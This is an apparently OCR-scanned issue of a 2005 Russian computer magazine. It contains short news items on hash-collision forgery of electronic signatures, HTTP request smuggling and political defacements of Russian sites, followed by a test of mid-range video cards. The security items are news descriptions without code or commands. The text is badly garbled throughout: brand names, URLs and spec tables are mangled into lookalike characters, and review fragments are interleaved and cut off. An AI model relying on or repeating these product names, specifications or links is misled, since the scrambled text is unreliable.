Компьютере (812) 542-4551; Барнаул: С-Тгасіе (3852) 38-10-00; Воронеж: РЕТ (0732) 77-93-39; Екатеринбург: Парад (3432) 51-48-22, Старттехно+ (3432) 56-85-01; Краснодар: 
Владос (8612) 62-33-73, Санрайз (8612) 640-066; Новосибирск: НЭТА (3832)16-33-11, Техносити (3832) 125-333; Ростов на Дону: Центр-Дон (8632) 698-668; Самара: Прагма 
(8462) 701-701 ; Томск: Интант (3822) 41-55-32; Тюмень: АО Зузіетз (3452) 22-35-33; Челябинск: Японская электроника (3512) 63-74-34; Хабаровск: Апукеу (4212) 328-155 
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ЭЛЕКТРОННЫЕ 
ПОДПИСИ УЯЗВИМЫ 

Хакерская послови- 
ца «Взломать можно 
все, вопрос только 
во времени» снова 
оправдала себя. На 
этот раз это отно- 
сится к электронным 
подписям, которые 
до недавнего вре- 
мени считались не- 
уязвимыми для взло- 
ма. ЭП создаются на основе содержимого файла — специаль- 
ный криптоалгоритм преобразует код в хэш-цепочку битов фикси- 
рованной длины, хэш вместе с электронным ключом использует- 
ся для генерации подписи. Каждая ЭП уникальна, и прилепить ее 
из одного документа в другой не удастся. Но в ходе исследова- 
ний двое ученых из разных университетов Штефан Дюкс и Магнус 
Даум придумали способ создать два разных документа с одина- 
ковой подписью. Основан он на подмене одного документа дру- 
гим. Используя давно известную уязвимость в хэш-функциях, мож- 
но соединить два документа в формате розізсгірі и показывать 
один из них, скрывая другой. Подобный способ можно использо- 
вать не только для взлома электронных подписей. Вскоре после 
объявления учеными о своем открытии, американская фирма 
ѴѴаГсГіГіге сообщила о появлении нового вида сетевых атак НИР 
Рериезі Зтиддііпд (контрабандный НТТР-запрос). Атака основа- 
на на внедрении вредоносных пакетов в обычный сетевой тра- 
фик, причем никакой фаервол не сможет распознать отклонения. 
С помощью таких жучков можно получить полный контроль над 
системой. Зесигііу-организация СЕРТ отнесла этот вид атаки к 
очень опасным. В сети уже появился документ, который подробно 
описывает технологию. Скачать его можно здесь: 
Іі іір У/и/и/и/, ѵѵаісіі Яге. сот/гезо игсез/НТТР-Редиезі-Зт иддііпд.рсі? 



ПОЛИТИЧЕСКАЯ 
ВОЙНА В РУНЕТЕ 

С мая по июнь рунет в 
буквальном смысле зах- 
лестнула волна полити- 
ческих дефейсов. По- 
литических — не в том 
смысле, что их прово- 
дили политики, а в том, 
что сделаны они были 
для политической про- 
паганды. В числе жертв 
оказались: Шр://кот- 
зотоі.ѵѵз, Шр://зкт-іі.ги, 

Іііір://]еѵѵізІі.ги, ѵѵѵѵѵѵ.тіід.ги, ѵѵѵѵѵѵ.апТіІа.ги и другие. Совершенно 
точно, что все эти взломы совершили одни и те же люди, так как 
после атаки взломщики оставили баннеры ультраправой нацио- 
нал-социалистической организации «Славянский Союз» с приг- 
лашением посетить кое-какие сайты. На рекомендованных сай- 
тах можно было найти причину взломов: «Наше подразделение 
информационной войны будет и в дальнейшем закрывать сайты, 
пропагандирующие толерантность, коммунизм, иудаизм и про- 
чие половые извращения на сексуальной почве...». Также взлом- 
щики пропагандировали вступить в их ряды и бороться со злом. 
Пожалуй, это первая в истории рунета хакерская активность на 
политической почве. Милиция, которая уже занялась расследо- 
д ванием, считает, что «Славянский союз» нанял группу хакеров 
для осуществления всех этих взломов, но точно пока ничего не 
известно. Кстати, вскоре после дефейсов, хак-тима АпГізГюге 
хакнула сайты, ссылку на которые оставили политические 
взломщики. Парни посоветовали своим «коллегам» не лезть, ку- 
да не следует, и вообще не высовываться. Хакерские разборки 
еще не закончились. 



АМЛ Х2 — ИХ СТАЛО 
БОЛЬШЕ 




Стремление поместить два процессорных ядра на один крис- 
талл не обошло стороной и компанию АМЭ. Новый виток процес- 
сорных войн ознаменовался выпуском двуядерного процессора 
АМЭ АГГіІоп 62 Х2. Такое вот простенькое название, объединив- 
шее в себе все новейшие технологии АМЭ. Пока в прайс-листе 
компании обретаются четыре таких ЦП. На ядре МапсГіезГег пост- 
роен процессор Х2 4200+ с реальной частотой 2,2 ГГц и 512 Кб 
кэш-памяти уровня 2 на каждое ядро. Также на этом ядре собра- 
на модель Х2 4600+ с тактовой частотой 2,4 ГГц. Более продвину- 
тым соге является Тоіебо. Чтобы оправдать эту смуглую красоту 
испанского колорита, в нем в два раза увеличен объем кэша І_2 — 
до 1024 Кб на каждое ядро. Соответственно, на сегодняшний 
день мы имеем четыре процессора (АМЭ АГГіІоп 64 Х2 4200+, 
4400+, 4600+ и 4800+), построенных на ядрах МапсГіезГег и Тоіебо. 
Стоимость их составляет от $540 до $ 1 000. Они выполнены в форм- 
факторе ЗоскеГ 939, для полноценной работы со старыми сис- 
темными платами в них потребуется обновить ВІО$. 



САПФИРОВЫЕ 

ИГРУШКИ 

Топовые видеоадаптеры ком- 
пании ЗаррГііге переходят имен- 
но на новую уникальную систе- 
му охлаждения. Она называет- 
ся ПдиісІ МеГаІ Сооііпд. По дан- 
ным компании, технология жид- 
кого металла обеспечивает теп- 
лопроводимость в 65 раз боль- 
шую, чем вода, и не требует движущихся компонентов. Жидкий 
металл это нетоксичное, негорючее и полностью безвредное для 
окружающей среды вещество. Электромагнитная помпа не име- 
ет механических движущихся частей, что снижает энергопотреб- 
ление и уровень шума. Таким кулерами оснащаются платы серии 
ВІінагсІ ЗАРРНІРЕ ВІінагсІ РАЭЕОІЧ Х850 ХТ и ВІіііагсІ РАЭЕОІЧ Х850 
ХТ РІаГіпит ЕсІіГіоп. Новые видеоплаты будут иметь 16 парал- 
лельных пиксельных конвейеров, 256 Мб памяти 0ЭЭРЗ и ин- 
терфейс РСІ Ехргезз. Также ЗаррГііге выпускает новую систем- 
ную плату под названием ЗаррГііге РІІРЕ (чипсет АТІ Ехргезз- 
200), рассчитанную на процессоры АМЭ АГГіІоп 64 и ЕХ. Уст- 
ройства этой серии имеют поддержку двух видеоплат РСІ- 
Ехргезз, функции разгона через ВІОЗ, работу с 4 Гб двухканаль- 
ной памяти ЭЭР400, дополнительные слоты расширения РСІ, 
І_АІ\І, Еіге\л/іге, ІІЗВ 2.0, встроенный многоканальный звук, а так- 
же ЗАТА-контроллер. 




ИТОГИ КОНКУРСА 
СІ.АСІАІ.ТЕСН 

Победителями конкурса Ѳіасіаі ТесГі стали: 

Макс (Ітгш@уапсіех.ги) и СОТО (доГтод@таіі.ги). Макс выиграл 
ПтЬа 2000, а СОТО получает Тигіэіпе 4500. 






][ЫЕ\Л/3 ▼ 



НАВРЫЕѴѴЗ ▼ 



КАКИМ ДОЛЖЕН 
БЫТЬ ІИТЕКИЕТ2? 




Думаю тебе, как обычному юзеру, грех жаловаться на возможности 
современного интернета. Особенно, если ты счастливый облада- 
тель 100 Мбитной безлимитной выделенки. Но ученые и компьютер- 
ные мыслители считают, что Сеть давно устарела и пора уже заду- 
маться о будущем, в котором Іпіегпеі2 — не прихоть, а суровая необ- 
ходимость. Есть много мнений относительного того, каким должен 
быть интернет нового поколения. Некоторые считают, что он должен 
быть основан на современных сетевых технологиях с улучшением их 
характеристик и повышением пропускной способности каналов. 
Доктор Дэвид Кларк, во многом благодаря которому компьютерные 
сети начали свое развитие в 70-х гг., считает иначе. По мнению Клар- 
ка, если не переписать архитектуру инета с нуля, то проблемы будут 
со временем накапливаться, и технологии, актуальные 30 лет назад, 
не смогут удовлетворить новым требованиям. Ученый выступил с заяв- 
лением, что собирается разработать новые сетевые стандарты, 
и для этой благой цели Национальное научное общество США выде- 
лило ему грант в 200 тысяч долларов. Полученные деньги Дэвид соби- 
рается потратить на организацию этим летом встречи известных се- 
тевых исследователей и ученых, чтобы совместным мозговым штур- 
мом вывести новые идеи и обсудить, как должен выглядеть интернет 
будущего. По мнению Кларка, основной задачей будет создать та- 
кую систему, которая позволит не только передавать огромные мас- 
сивы данных за секунды, но также объединить сотни миллионов быто- 
вых устройств, гаджетов и прочих беспроводных безделушек. Все на- 
работки будут испытываться в научной сети І_атЬсІаРаіІ, специально 
созданной для проведения разного рода сетевых экспериментов. 



НЕУГОМОННЫЙ йон 

Немногим хакерам удается стать всемир- 
но известными. Тем более в возрасте 15-ти 
лет. Одним из таких уникумов стал Йон Лех 
Йохансен, который в 1999 г. написал 
ЭеСЗЗ — дешифровщик кода С53 (Сопіепі 
ЗсгатЫіпд Зузіет), используемый для за- 
щиты от копирования в ЭѴЭ. В 2000 году его 

арестовали и более двух лет пытались 

привлечь к ответственности (хотя ему было 
только 16), пока не сняли все обвинения 
в 2003 г. Год назад Йон снова засветился в прессе. На этот раз 
скандал был вокруг его программки, позволяющей обходить за- 
щиту от нелегального скачивания трЗ с е-шопа Арріе іТипез 
Мизіс ЗГоге. Видно, Йон любит быть в центре внимания, так как не- 
давно он выпустил новый «продукт», на этот раз нацеленный на 
новый сервис Ѳоодіе. На своем сайте с лозунгом «Ну да, арес- 
туйте меня» (/т іір :// и/и/и/, па по сге ѵѵ.пеі), Йохансен выложил 
крак, который позволяет снять ограничение с Ѳоодіе Ѵісіео 
Ѵіе\л/ег. ѲѴѴ позволяет находить и проигрывать видео-фрагмен- 
ты, хостящиеся на серваках Ѳоодіе, но благодаря краку Йона, 
можно искать и проигрывать любые видеофайлы, на каком бы 
сайте или фтп они не валялись. Как и все остальные свои «зап- 
латки», эту Йон написал в результате реверс-инженеринга ори- 
гинального кода проигрывателя. Пресс-секретарь компании 
Нейт Тайлер сказала в интервью, что подобная модификация не 
является чем-то противозаконным, и в доказательство Ѳоодіе вы- 
ложил код заплатки на своем сайте. 





Американская компания Віопіс ЭоІрГііп ( ѵѵѵѵѵѵ.ЫопіссІоІрІііп.сот ) 
приступила к серийному производству ныряющих катеров на 
подводных крыльях. Эти пилотируемые агрегаты похожи на дель- 
финов не только своим видом и размерами. Они способны ны- 
рять на глубину до 3 метров, подпрыгивать над водой, как насто- 
ящие дельфины, и продолжительное время двигаться вдоль пове- 
рхности, демонстрируя плавник. В этот момент двигатель внут- 
реннего сгорания и пассажиры получают кислород через рас- 
положенную в плавнике трубку. Катера оснащены двигателем от 
Корветта мощностью 400 л.с. В носовой части аппарата обору- 
дован шлюз, позволяющий брать людей на борт прямо под во- 
дой. Двухместная конструкция катера-дельфина поступит в про- 
дажу уже в начале 2006 года. Стоимость первых экземпляров ка- 
тера составляет 50 тысяч долларов. 




ПОЙМАЙ, ЕСЛИ СМОЖЕШЬ! 



Разыгрываются 5 цветных лазерных принтеров! 



Сотни призов каждый месяц - 5 шансов на выигрыш 
Смотрите условия на специальных упаковках с эмблемой акции 



В каждой упаковке Оідііех с эмблемой 
ищите шанс выиграть один из тысячи 
фантастических призов - включая 
великолепный настольный цветной 
принтер 0КІ С3100 - каждый месяц! 

Чтобы стать претендентом, просто 
присоединяйтесь к нашему розыгрышу. 
Это элементарно! Помните - чем раньше 
начнёте, тем больше шансов на выигрыш. 
А играть Вы можете сколько угодно! 

С апреля по август 2005, мы дарим Вам 
Бо^'п'БЕгопд 115В РідіЕех, МРЗ плееры, 
коврики для мыши и ещё много, много 
всего в наших захватывающих 
ежемесячных розыгрышах. 



Присоединяйтесь! Найдите одну из 
упаковок Оідііех с эмблемой - 
и Вы можете стать 




от визиток до баннеров 
длиной 1,2 метра! 



СМОТРИТЕ ПОДРОБНОСТИ АКЦИИ НА ѴѴѴѴѴѴ.0І6ІТЕХ.КУ 





ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА ВЗЛОМ 




ЗАРРНІРЕ РАОЕОЫ Х700 РРО НУВРЮ 256 МБ I РОѴѴЕРСОЮР РАйЕОЫ Х700 ВРАѴО 256 МБ 
0ЕС11ВЕ РАйЕОЫ Х700 РРО 128 МБ (НР7ООРРО0-СЗ) I 5АРРНІРЕ РАйЕОЫ Х700 НУВРЮ 128 МБ 
0АІЫѴѴАРО РОѴѴЕРРАСК ІАТРА/1960РСХ ХР 0ОЫЭЕЫ 5АМРІ.Е 01Н 128 МБ 














[іпіто] 



В ЦЕНТРЕ ВСЕ СПОКОЙНО 



ТЕСТ-ДРАЙВ ЦЕНТРОВЫХ ВИДЕОКАРТОЧЕК 

Чтобы там кто ни говорил, а быть в середине — это самый смак. Спереди, конечно, неплохо — 
там всегда самые-самые. Самые сильные, крутые, смелые, быстрые, мощные и так далее. Но 
вот только они дорогие очень. За это их не любит народ. Быть последним, в этом тоже есть свои 
плюсы. В тылу тепло и спокойно, никто не трогает. Там сидят самые слабые и самые дешевые. 
Собственно, за их слабость их и не любят. Естественно, речь идет о видеоплатах. Поэтому сегод- 
ня мы тестируем самые сладкие устройства — из середины. Средние по скорости, но способ- 
ные к разгону, средние по цене, а поэтому доступные. То есть те платы, которые имеют наиболь- 
шие шансы поселиться в твоем системном блоке. Чтобы там оказалась наиболее достойная мы, 
сегодня проводим тест десяти графических адаптеров из сегмента тісісііе-епсі. 



Ю 

О 



[технологи] 




і'і 



Ситуация сегодня сложилась довольно-таки интересная. Если смотреть по ценам, то 
сегодняшний тісісііе-епсі получается очень обширным: сегодняшние устройства стоят, 
в зависимости от мощи чипсета и комплекта поставки, от $110 до $220. Каждый сможет 
подобрать изделие именно для себя, для своих потребностей. Это может быть либо са- 
мая дешевая плата, в комплекте поставки которой будет только руководство пользова- 
теля и драйверы и которая приобретается исключительно для разгона, либо вполне 
солидное и дорогостоящее изделие, с богатым комплектом поставки, которое ты 
просто установишь, и будешь наслаждаться скоростью и качеством игр. На что стоит 
обратить внимание? Начнем с адаптеров, приобретаемых с прицелом на оверклок. 
Ищем плату, построенную на базовой версии чипсета, например ѲеЕогсе 6600, безо 
всяких приставок вроде ѲТ или І_Е. Первая обозначает разогнанный в заводских усло- 
виях чип, который стоит дороже обычного. А зачем тебе за это платить, коли уж ты ре- 
шил разогнать его сам? Вторая приписка может указывать на урезанную шину памяти 
или еще что-то столь неприемлемое для гонщика. Поэтому твой выбор — простой базо- 
вый чип. Обязательно взгляни на систему охлаждения! Если на плате установлены боль- 
шие радиаторы, закрывающие чипсет и память, и их обдувает качественный кулер, то 
все просто отлично. Но хорошей платформой может стать и система пассивного ох- 
лаждения, то есть, состоящая только из радиаторов. Она совершенно бесшумна, а 
вентилятор на нее можно установить при необходимости. Тем более, что выберешь ты 
епрісам. Обязательно поинтересуйся памятью! Модули ЭЭР1 в упаковке ТЗОР, да еще 
и с ^латентностью 4 нс могут стать серьезным препятствием для разгона. Латентность 
должна быть не менее 2 нс, а если паять будет типа ОЭЭРЗ, то это просто прекрасно. 
Обычному пользователю стоит взять плату на продвинутом чипсете (ОеРогсе 6600ѲТ 
или Х700 РІЮ) с хорошей системой охлаждения (радиатор+вентилятор). Такая плата 
прослужит долго и будет обеспечивать хорошую скорость. Долголетие можно прод- 
лить, если устройство и твоя системная плата поддерживают режим $І_І или СгоззИге. 
Когда через годик ты захочешь купить аналогичную плату для тандема, стоить она бу- 
дет очень дешево. Но не забудь о мощном БП. Кстати, большинство плат обзора не тре- 
буют дополнительного питания. 



Мат. плата: Азиз Р5Ѵ\Ю2 Ргетіит 






Память: 2x512 Мб Согзаіг СМ2Х512А-4300СЗРРО 






Процессор: Іпіе! РепТіит 4 ЕЕ 3,73 ГГ ц 




Кулер: ІпГе! Вох 





Жесткий диск: ѴѴезіегп РідііаІ ѴѴР200 5АТА 



Блок питания: 480 Вт ТГіегтаІГаке РигеРо\л/ег ВиТТеіИу ѴѴ0020 



СНАІЫТЕСН ОЕЕОРСЕ 6600 128 МБ I АОРЕЫ АЕОШ5 6600 (РСХ6600-ОѴ128І.Р) 128 МБ 
А51І5 ЕАХ700-Х 128 МБ I РОМЕРСОЮР РАРЕОЫ Х800 128МБ I А51І5 ЕАХ700 128 МБ 



ТезНаЬ выражает благодарность за предоставленное оборудование компании ОЛДИ ((095)105-0700, \ллллл/.о!сІі.ги) российским представительствам компаний Аореп, Азиз, АТІ, Ѳаіп\л/агсІ, ЗаррЬіге, ІЧѴЮІА 





[ХАКЕР 07 [79] 05 > РЕВВІІМ 016 ] 



Методика тестирования 



Для видеоплат на базе чипов от АН использовались драйвера СаіаІузТ 5.6, а для их конкурентов в лице пѴісІіа — РогсеѴѴаге 
версии 66.72. Все игры запускались при максимальном качестве детализации в двух разрешениях: 1024x768 и 1600x1200. 
РагСгу имел версию 1,3, для НІ_2 устанавливались все обновления. Все версии ЗЭтагка запускались при стандартных наст- 
ройках и разрешении 1024x768. Используемая в тестовом стенде, системная плата имеет функцию разгона графического 
адаптера по частоте. Она самостоятельно немного повышает частоты работы устройств. Мы не стали ее отключать, так как 
на расстановку видеосил это не влияет. В связи с этим в ТТХ были указаны уже слегка разогнанные характеристики. 



Шит» ргз'щщрАШ 1№пиъ/ 

1960РСХ ХР Ооісіѳп Затріѳ ѲШ 128 Мб 

Ядро: пѴісІіа ІЧѴ43 


аореж жшші тттті 

(РСХ660(ЮѴ128І_Р) 128 Мб 

Ядро: пѴісІіа ІЧѴ43 


РошшСоьоя Кйэшш жттт 
ВПАѴО/ 256 Мб (В41АВ-МЭЗО) 

Ядро: АН ВѴ410 


Кол-во пиксельных конвейеров, шт: 8 


Кол-во пиксельных конвейеров, шт: 8 


Кол-во пиксельных конвейеров, шт: 8 


Шина памяти, бит: 128 


Шина памяти, бит: 128 


Шина памяти, бит: 128 


Объем памяти, Мб: 128 


Объем памяти, Мб: 128 


Объем памяти, Мб: 256 


Частота ядра, МГц: 540 


Частота ядра, МГц: 309 


Частота ядра, МГц: 412 


Частота памяти, МГц: 575 (1150) 


Частота памяти, МГц: 360(720) 


Частота памяти, МГц: 272 (544) 


Тип памяти: СЮЦВ-3 


Тип памяти: СЮЭВЗ 


Тип памяти: СЮРВ-2 


Латентность памяти, нс: 1 ,6 


Латентность памяти, нс: 2,0 


Латентность памяти, нс: 3,7 


Техпроцесс ядра, мкм: 0,11 


Техпроцесс ядра, мкм: 0,11 


Техпроцесс ядра, мкм: 0,11 


ѴІѴО: есть 


ѴІѴО: нет 


ѴІѴО: есть 


Разъемы: ЦѴІ, ЦѴІ, ТѴ-ОиІ 


Разъемы: О-ЗІЛЗ, ОѴІ, ТѴ-ОиІ 


Разъемы: ЦѴІ, ЦѴІ, ѴІѴО 


ПО в комплекте: тиѵее аиІоРгосІисег 3, ІпІегѴісІео ѴѴіпЦѴЦ 5 


ПО в комплекте: ЗесопсІ Зідбі 


ПО в комплекте: СуЬегІіпк ЦѴЦ Зоіиііоп, Ніітап Сопігасіз 2СО 


Эта плата собрана на чипсете, который известен 
тем, что обладает высокой производительностью 
при сравнительно невысокой цене, а в купе с широ- 
кими возможностями разгона представляет собой 
просто-таки идеальный НМС среднего уровня. Ком- 
пания Ѳаіп\л/агб вдобавок оснастила свою плату 
128 Мб быстрой памяти ѲЭЭРЗ с латентностью 1,6 нс 
и подняла рабочие частоты (по сравнению с рефе- 
ренсным изделием), поэтому результат оказался 
очень хорошим — высокая производительность. Уве- 
личить ее можно путем покупки второй платы и режи- 
ма $І_І, поддержка такой работы имеется. Охлажде- 
ние представлено радиаторами, наклеенными на 
микросхемы памяти, а также вентилятором с двумя 
особенностями. Первая, положительная,— он светит- 
ся, вторая, отрицательная, — закреплен он не очень 
надежно. Плата оснащена гнездом ѴІѴО, а также 
двумя портами ЭѴІ. В комплект поставки входят разно- 
образные программы, а также утилита для разгона. 
Тем, кого интересуют технические детали, следует 
знать, что ширина шины памяти равна 128 битам, а 
пиксельных конвейеров тут чертова дюжина. 


Достоинства этой платы видно сразу — она 
имеет небольшие размеры, поэтому поместит- 
ся в любой, даже самый тесный системный 
блок. Охлаждается она исключительно радиа- 
торами, вентилятора на ней нет. В общем-то, 
для нее это плюс — работает она совершенно 
бесшумно. Греется она не сильно, так что если 
не заниматься разгоном, то вентилятор и не по- 
надобится. Но не использовать такую возмож- 
ность будет жалко, так как для оверклокинга 
это изделие подходит очень хорошо,а вот ба- 
зовая производительность у него невысокая. 
Что ж, в таком случае можно будет легко уста- 
новить вентилятор. На плате находятся 128 Мб 
памяти типа ѲЭЭРЗ с латентностью 2 нс (а это 
редкость для плат на ѲеРогсе 6600), чипсет 
имеет 8 пиксельных конвейеров. Комплект пос- 
тавки бедный, состоит всего лишь из одной иг- 
ры. Для подключения к компьютеру имеются 
порты ЭѴІ и Э-ЗІІВ. Зато у нее невысокая цена. 
Наверняка, она придется по вкусу оверклоке- 
рам, а также экономным пользователям. 


Несмотря на то, что эта плата построена далеко 
не на самом новом и мощном чипсете, она может 
найти себе массу поклонников среди тех людей, 
которые обладают определенными технически- 
ми навыками, необходимыми для оѵегсіоск. Ско- 
рее всего, их не смутит низкая базовая произво- 
дительность. Потому что плата хорошо поддается 
разгону и имеет невысокую стоимость. А вот сис- 
тема охлаждения у нее самая что ни на есть под- 
ходящая — два огромных радиатора с малень- 
ким съемным вентилятором. Она эффективна, мо- 
жет быть бесшумной, а при смене вентилятора на 
более мощный, гарантирует отличный разгон. На 
борту находятся 256 Мб памяти ѲЭЭР2 со 128-бит- 
ной шиной памяти, а также 8 пиксельных конвейе- 
ров. Кроме уже упоминавшейся выше утилиты для 
разгона, в комплект поставки входит набор прог- 
раммного обеспечения СуЬегШпк для работы с 
видео (хотя портом ѴІѴО плата не оснащена), а 
также игра Ніітпап. С компьютером предлагается 
соединяться через порт ЭѴІ — их тут целых два. Ес- 
тественно, с переходниками на Э-Зиб. 









Выводы 


За непревзойденный уровень производительности для плат этого класса награду "Выбор редакции" получает 
Ѳаіп\л/агсІ Ро\л/егРаск Шга/1960РСХ ХР Ѳоісіеп Затріе СЫН. И все это не за самую высокую стоимость. А "Луч- 
шую покупку" за замечательные соотношения цена/производительность/разгонный потенциал получает 
ЗаррЫге Расіеоп Х700 НуЬгісІ. А вот внимание оверклокеров и любителей бэйрбонов должна привлечь Аореп 
Аеоіиз 6600. Первым она понравится за массивные радиаторы и установленную ѲЭЭР-З память, которая име- 
ет очень приличный запас по частоте. Вторым — за небольшие габариты. 



ОеСцве Жашш Ж70® 

Лю/128 Мб (НР700РРОѲ-СЗ) 

Ядро: АН ВѴ410 


ЕАЖ700/128 Мб 

Ядро: АН ВѴ410 


Шарршне Жжоі« Х700 
РМ0 Ита®то/256Мб 

Ядро: АН ВѴ410 


Кол-во пиксельных конвейеров, шт: 8 


Кол-во пиксельных конвейеров, шт: 8 


Кол-во пиксельных конвейеров, шт: 8 


Шина памяти, бит: 128 


Шина памяти, бит: 128 


Шина памяти, бит: 128 


Объем памяти, Мб: 128 


Объем памяти, Мб: 128 


Объем памяти, Мб: 256 


Частота ядра, МГц: 445 


Частота ядра, МГц: 412 


Частота ядра, МГц: 445 


Частота памяти, МГц: 452 (904) 


Частота памяти, МГц: 365 (730) 


Частота памяти, МГц: 452 (904) 


Тип памяти: ОРЦВ-З 


Тип памяти: ООВ-1, ВОА 


Тип памяти: СЮОВ-3 


Латентность памяти, нс: 2,0 


Латентность памяти, нс: 2,8 


Латентность памяти, нс: 2,0 


Техпроцесс ядра, мкм: 0,11 


Техпроцесс ядра, мкм: 0,11 


Техпроцесс ядра, мкм: 0,11 


ѴІѴО: есть 


ѴІѴО: нет 


ѴІѴО: нет 


Разъемы: 0-311 В, ОѴІ, ѴІѴО 


Разъемы: 0-ЗІІВ, ОѴІ, ТѴ-ОиІ 


Разъемы: 0-51ІВ, ОѴІ, ТѴ-ОиІ 


ПО в комплекте: СуЬегІіпк РоѵѵегОѴО 5 


ПО в комплекте: отсутствует 


ПО в комплекте: Ргіпсе о! Регзіа ТЬе Запсіз о! Тіте 2СО, 
Зрііпіег СеІІ Рапбога Тотоггоѵѵ ОѴО, СуЬегІіпк РоѵѵегОѴО 5 

Очень мощная плата. У нее сильный чипсет, яд- 
ро которого содержит восемь пиксельных кон- 
вейеров, шина памяти шириной 128 бит, в са- 
мой памяти 256 Мб, причем самого современ- 
ного типа — ѲЭЭРЗ. Несмотря на то, что инже- 
неры компании ЗаррЬіге дали ей достаточную 
производительность, резерв у нее остался, по- 
этому разгону она вполне поддается. Этому 
способствует и соответствующая утилита из 
комплекта поставки. Помимо нее туда входят иг- 
ры Ргісе о^ Регзіа: ТТіе Запсіз о^ Тіте и ЗрііпТег СеІІ: 
Рапбога Топпоггоѵу, а также программа 
СуЬегЫпк РоѵуегЭѴЭ. Сама плата, как и ее соб- 
рат, собранный на менее мощном чипсете 
и описанный выше, сделана в фирменном сти- 
ле ЗаррЬіге — синий цвет доминирует во всем: 
в коробке, оснащенной окошком, в текстолиет 
платы и в кулере. Для подключения к компьюте- 
ру есть порты ЭѴІ и Э-ЗІІВ. Недостатком этого 
изделия является его высокая стоимость. 


Если ты любишь сэндвичи, то эта плата подой- 
дет тебе как нельзя лучше. Она действительно 
похожа на этот буржуйский бутерброд — 
роль мяса тут выполняет сама плата, а радиа- 
торы играют роль хлеба, между которым это 
мясо и заключено. Кстати, хлеб этот массивен 
и соединен тепловыми трубками. Поэтому ох- 
лаждение тут качественное, эффективное и, 
что очень и очень немаловажно, бесшумное. 
Тишина хороша всегда, а вот эффективность 
пригодится при разгоне, на который эта плата 
очень хорошо способна. Правда, в этом слу- 
чае может понадобится установка вентилято- 
ра. Вообще, базовая производительность у 
нее средняя, несмотря на 8 пиксельных кон- 
вейеров и хорошую память — 128 Мб ѲЭЭРЗ 
(шина 128 бит), а латентность у нее 2 нс. Име- 
ются гнезда 0-511 В и ОѴІ. Комплект поставки 
состоит из программы СуЬегЫпк Ро\л/ег ОѴО. 
Немного, но что поделать? 


Разные платы могут выделяться разными вещами: 
кто-то производительностью, кто-то оригиналь- 
ной системой охлаждения, кто-то всем этим 
вместе, а еще и чем-то третьим придачу. А вот 
это изделие выделяется шумным кулером (кото- 
рый, несмотря на свою крикливость, все-таки 
охлаждает не только чипсет, но и память). Но не 
только этим. Еще у него низкая производитель- 
ность. Вроде, и 8 пиксельных конвейеров есть, 
и 128 Мб памяти, и шина у нее 128 бит, и латент- 
ность у памяти низкая, всего 2 нс, а вот произво- 
дительность низкая. Но это базовая. Реально ее 
можно увеличить с помощью разгона, плата ему 
легко поддается. И результат получается хоро- 
ший. Учитывая все вышесказанное, но особен- 
но склонность платы к разгону, можно сказать, 
что соотношение цена производительность 
у нее хорошее. Комплект поставки тут, прямо 
скажем, бедноват, только драйверы и руковод- 
ство пользователя. Для соединения с монито- 
ром есть порты ЭѴІ и Э-ЗІІВ. 




[ХАКЕР 07 [ 79 ] 05 > РЕВПУМ 017 ] 




[хакер 07 [79] 05 > ГЕПВІІМ 018 ] 



Сжшиебш ОиРотше ©ТОѲ/128 Мб 

Ядро: пѴісІіа ЫѴ43 

Кол-во пиксельных конвейеров, шт: 8 

Шина памяти, бит: 128 

Объем памяти, Мб: 128 

Частота ядра, МГц: 309 



Частота памяти, МГц: 282(564) 



Тип памяти: РРВ1 , Т50Р 



Латентность памяти, нс: 4,0 



Техпроцесс ядра, мкм: 0,1 1 
ѴІѴО: нет 



Разъемы: О-ЗІЛЗ, ЭѴІ, ТѴ-ОиІ 



ПО в комплекте: ѴѴШѴО 5, Ш\пОУО Сгеаіог 2, ѴѴіпВір 2.1 , йѴй 
Сору 2 иіе, Ноте Тііеаіег 2.1 І_Ие, Оате Раск (Рето ѵегзіопз) 

Сразу же хочу открыть тебе главную тайну этой 
платы — она не сможет работать в режиме $І_І! 
Вот и думай, хорошо это или плохо... Наверное, 

2ЮОО/128 Мб (В43А-ІЧСЗ) 

Ядро: АТІ В430 

Кол-во пиксельных конвейеров, шт: 12 

і РІинаіЩ^ 

Объем памяти, Мб: 128 

Частота ядра, МГ ц: 405 

Частота памяти, МГц: 364(728) 

Латентность памяти, нс: 2,0 

Техпроцесс ядра, мкм: 0,11 

ѴІѴО: есть 

ПО в комплекте: СуЬегІіпк РУР Зоіиііоп, Ніітап Сопігасіз 2СР 



В противоположность предыдущему изделию, 
плата РоѵуегСоІог обладает отличной памятью. 
Это тоже ЭЭР1, но ее латентность равна 2 нс, что 
является хорошим показателям устройств данно- 
го ценового диапазона, а ширина шины памяти 
(на борту ее 128 Мб) составляет 256 бит. Также 
она может похвастаться максимальным количе- 
ством пиксельных конвейеров — 12, больше в на- 
шем сегодняшнем тесте ни у кого не обнаружи- 
лось. Базовая производительность у нее хоро- 
шая, но ее можно повысить разгоном, плата будет 
на него согласна. А для того, чтобы у нее не на- 
чался жар, есть тихий и очень эффективный кулер, 
который охлаждает и чипсет, и память. Для соеди- 
нения с компьютерным монитором есть порты ЭѴІ 
и Э-ЗІІВ. В комплект поставки входит набор прог- 
рамм от СуЬегШпк и игра Ніітап: СопТгас1\ Кстати, 
если ты обладатель современной системной 
платы, то можешь на основе этого видеоадапте- 
ра сделать режим СгоззИге. Правда, тут может 
быть одно но. Это устройство довольно длинное, 
по сравнению с другими из теста, оно длиннее на 
пару сантиметров. Имеется зато у нее порт ѴІѴО. 



просто все равно. Но факт остается фактом, в 
пару ее не поставишь. В комплект поставки 
входит набор программ от ІпТегѴібео, а также 
набор демоверсий игры. Ну, не первой необ- 
ходимости вещи, но все-таки могут пригодить- 
ся. И уж точно это лучше, чем ничего. Памяти 
тут стандартные, в общем-то, для нашего теста 
количество — 128 Мб при шине 128 бит. А вот 
дальше идет сплошное безобразие — тип па- 
мяти ЭЭР1, высокая латентность 4 нс, упаковка 
— устаревший ТЗОР. Пиксельных конвейеров 8 
штук, тоже все как обычно. С производитель- 
ностью, опять же, обычная ситуация по умол- 
чанию она невысока, а вот с помощью систе- 
мы оѵегсіоск можно многого добиться. Кулер 
тут хороший, да и выглядит необычно. Порты 
есть ЭѴІ и Э-ЗиЬ. 



Лкжиж ЖАЖУОО-Ж/128М6 

Ядро: АТІ ВѴ410 

Кол-во пиксельных конвейеров, шт: 8 




Шина памят и, 

Объем памяти, Мб: 128 



Частота янйа, МГЩ412 



Частота памяти, МГц: 263 (508) 



ШШІпаМятм'^ШШРІ 1ЩЗРВ?ЦІ 
Латентность памяти, нс: 4,0 



